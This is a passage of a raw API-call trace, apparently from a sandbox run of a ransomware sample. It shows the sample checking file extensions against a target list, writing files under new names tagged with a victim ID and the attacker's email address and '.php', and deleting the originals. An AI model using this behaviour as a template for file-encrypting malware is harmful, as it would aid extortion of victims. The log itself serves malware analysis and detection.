(lpString1=".docx", lpString2="W.GIF") returned -1 [0046.775] lstrlenW (lpString=".pdf") returned 4 [0046.775] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.775] lstrlenW (lpString=".xls") returned 4 [0046.775] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.775] lstrlenW (lpString=".xlsx") returned 5 [0046.775] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.775] lstrlenW (lpString=".ppt") returned 4 [0046.775] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString=".zip") returned 4 [0046.775] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.775] lstrlenW (lpString=".rar") returned 4 [0046.775] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.775] lstrlenW (lpString=".bz2") returned 4 [0046.775] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.775] lstrlenW (lpString=".7z") returned 3 [0046.775] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString=".dbf") returned 4 [0046.775] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString=".1cd") returned 4 [0046.775] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.776] lstrlenW (lpString=".jpg") returned 4 [0046.776] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.776] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.776] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.776] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=20575) returned 1 [0046.776] CloseHandle (hObject=0x214) returned 1 [0046.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 0x20 [0046.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.776] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.776] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.777] GetLastError () returned 0x0 [0046.777] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x505f, lpOverlapped=0x0) returned 1 [0046.779] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x5060, lpOverlapped=0x0) returned 1 [0046.780] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.780] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.780] SetEndOfFile (hFile=0x1b4) returned 1 [0046.780] CloseHandle (hObject=0x1b4) returned 1 [0046.780] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.780] SetEndOfFile (hFile=0x214) returned 1 [0046.781] CloseHandle (hObject=0x214) returned 1 [0046.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.781] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1 [0046.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.781] lstrlenW (lpString=".doc") returned 4 [0046.782] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.782] lstrlenW (lpString=".docx") returned 5 [0046.782] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.782] lstrlenW (lpString=".pdf") returned 4 [0046.782] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.782] lstrlenW (lpString=".xls") returned 4 [0046.782] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.782] lstrlenW (lpString=".xlsx") returned 5 [0046.782] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.782] lstrlenW (lpString=".ppt") returned 4 [0046.782] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.782] lstrlenW (lpString=".zip") returned 4 [0046.782] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.782] lstrlenW (lpString=".rar") returned 4 [0046.782] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.782] lstrlenW (lpString=".bz2") returned 4 [0046.782] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.782] lstrlenW (lpString=".7z") returned 3 [0046.782] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.782] lstrlenW (lpString=".dbf") returned 4 [0046.782] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.782] lstrlenW (lpString=".1cd") returned 4 [0046.782] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.782] lstrlenW (lpString=".jpg") returned 4 [0046.782] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.782] lstrlenW (lpString=".doc") returned 4 [0046.782] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.783] lstrlenW (lpString=".docx") returned 5 [0046.783] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.783] lstrlenW (lpString=".pdf") returned 4 [0046.783] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.783] lstrlenW (lpString=".xls") returned 4 [0046.783] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.783] lstrlenW (lpString=".xlsx") returned 5 [0046.783] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.783] lstrlenW (lpString=".ppt") returned 4 [0046.783] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.783] lstrlenW (lpString=".zip") returned 4 [0046.783] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.783] lstrlenW (lpString=".rar") returned 4 [0046.783] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.783] lstrlenW (lpString=".bz2") returned 4 [0046.783] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.783] lstrlenW (lpString=".7z") returned 3 [0046.783] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.783] lstrlenW (lpString=".dbf") returned 4 [0046.783] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.783] lstrlenW (lpString=".1cd") returned 4 [0046.783] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0046.783] lstrlenW (lpString=".jpg") returned 4 [0046.783] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.783] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.784] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.784] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1287) returned 1 [0046.784] CloseHandle (hObject=0x214) returned 1 [0046.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 0x20 [0046.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.784] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.784] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.786] GetLastError () returned 0x0 [0046.786] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x507, lpOverlapped=0x0) returned 1 [0046.788] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x510, lpOverlapped=0x0) returned 1 [0046.788] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.788] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.789] SetEndOfFile (hFile=0x1b4) returned 1 [0046.789] CloseHandle (hObject=0x1b4) returned 1 [0046.789] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.789] SetEndOfFile (hFile=0x214) returned 1 [0046.790] CloseHandle (hObject=0x214) returned 1 [0046.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.790] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 1 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.790] lstrlenW (lpString=".doc") returned 4 [0046.790] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.790] lstrlenW (lpString=".docx") returned 5 [0046.790] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.790] lstrlenW (lpString=".pdf") returned 4 [0046.790] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.790] lstrlenW (lpString=".xls") returned 4 [0046.790] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.790] lstrlenW (lpString=".xlsx") returned 5 [0046.790] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.790] lstrlenW (lpString=".ppt") returned 4 [0046.790] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString=".zip") returned 4 [0046.791] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.791] lstrlenW (lpString=".rar") returned 4 [0046.791] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.791] lstrlenW (lpString=".bz2") returned 4 [0046.791] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.791] lstrlenW (lpString=".7z") returned 3 [0046.791] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString=".dbf") returned 4 [0046.791] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString=".1cd") returned 4 [0046.791] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString=".jpg") returned 4 [0046.791] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString=".doc") returned 4 [0046.791] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.791] lstrlenW (lpString=".docx") returned 5 [0046.791] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.791] lstrlenW (lpString=".pdf") returned 4 [0046.791] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.791] lstrlenW (lpString=".xls") returned 4 [0046.791] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.791] lstrlenW (lpString=".xlsx") returned 5 [0046.791] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.791] lstrlenW (lpString=".ppt") returned 4 [0046.791] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.791] lstrlenW (lpString=".zip") returned 4 [0046.791] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.792] lstrlenW (lpString=".rar") returned 4 [0046.792] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.792] lstrlenW (lpString=".bz2") returned 4 [0046.792] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.792] lstrlenW (lpString=".7z") returned 3 [0046.792] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.792] lstrlenW (lpString=".dbf") returned 4 [0046.792] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.792] lstrlenW (lpString=".1cd") returned 4 [0046.792] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0046.792] lstrlenW (lpString=".jpg") returned 4 [0046.792] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.792] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.792] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.792] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=28595) returned 1 [0046.792] CloseHandle (hObject=0x214) returned 1 [0046.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 0x20 [0046.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.793] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.793] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.793] GetLastError () returned 0x0 [0046.793] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x6fb3, lpOverlapped=0x0) returned 1 [0046.906] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x6fc0, lpOverlapped=0x0) returned 1 [0046.908] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.908] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.908] SetEndOfFile (hFile=0x1b4) returned 1 [0046.908] CloseHandle (hObject=0x1b4) returned 1 [0046.908] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.908] SetEndOfFile (hFile=0x214) returned 1 [0046.909] CloseHandle (hObject=0x214) returned 1 [0046.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.910] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1 [0046.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.910] lstrlenW (lpString=".doc") returned 4 [0046.910] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.910] lstrlenW (lpString=".docx") returned 5 [0046.910] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.910] lstrlenW (lpString=".pdf") returned 4 [0046.910] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.910] lstrlenW (lpString=".xls") returned 4 [0046.910] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.910] lstrlenW (lpString=".xlsx") returned 5 [0046.910] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.910] lstrlenW (lpString=".ppt") returned 4 [0046.910] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.910] lstrlenW (lpString=".zip") returned 4 [0046.910] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.910] lstrlenW (lpString=".rar") returned 4 [0046.910] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.910] lstrlenW (lpString=".bz2") returned 4 [0046.911] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.911] lstrlenW (lpString=".7z") returned 3 [0046.911] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.911] lstrlenW (lpString=".dbf") returned 4 [0046.911] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.911] lstrlenW (lpString=".1cd") returned 4 [0046.911] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.911] lstrlenW (lpString=".jpg") returned 4 [0046.911] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.911] lstrlenW (lpString=".doc") returned 4 [0046.911] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.911] lstrlenW (lpString=".docx") returned 5 [0046.911] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.911] lstrlenW (lpString=".pdf") returned 4 [0046.911] 